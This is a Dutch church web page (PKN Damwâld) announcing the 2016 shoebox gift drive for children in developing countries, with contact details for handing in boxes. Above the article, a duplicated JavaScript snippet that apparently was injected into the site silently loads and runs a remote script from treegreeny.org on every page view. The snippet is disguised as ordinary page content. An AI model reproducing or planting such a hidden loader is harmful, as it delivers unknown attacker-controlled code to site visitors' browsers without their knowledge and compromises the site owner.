;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wie geef jij een onvergetelijk cadeau ? Schoenendoosactie 2016 ! - PKN Damwâld

Wie geef jij een onvergetelijk cadeau ? Schoenendoosactie 2016 !

Gepubliceerd op: maandag 24 oktober 2016

Van schoenendoos tot onvergetelijk cadeau. Onderwijs is zoveel meer dan leren schrijven en rekenen. Door mee te doen met leren kinderen een waardevolle les: dat geven om een ander belangrijk is. En krijgen leeftijdsgenootjes in ontwikkelingslanden een onvergetelijk cadeau! Kinderen in Nederland vullen een schoenendoos met schoolspullen, toiletartikelen en speelgoed voor leeftijdsgenootjes in ontwikkelingslanden. Ze doen daarmee iets concreets voor vriendjes in arme landen.

De schoenendozen gaan naar kinderen op scholen, in weeshuizen, vluchtelingenkampen en opvangcentra voor straatkinderen.

Er kunnen weer schoenendozen gevuld worden voor kinderen uit landen, die bijna niets hebben. Een doos met spullen maakt hen blij. Dit jaar gaan de schoenendozen naar West Afrika, Oost-Europa en het Midden Oosten. Beide PKN-kerken in Damwâld doen – net als de scholen – weer mee aan deze actie.  Zondag 13 november kunnen de dozen in beide diensten worden ingeleverd. Meer info bij: Sjoerd en Matty van der Werf (- 424146) en/of Nienke van der Heide (-422360)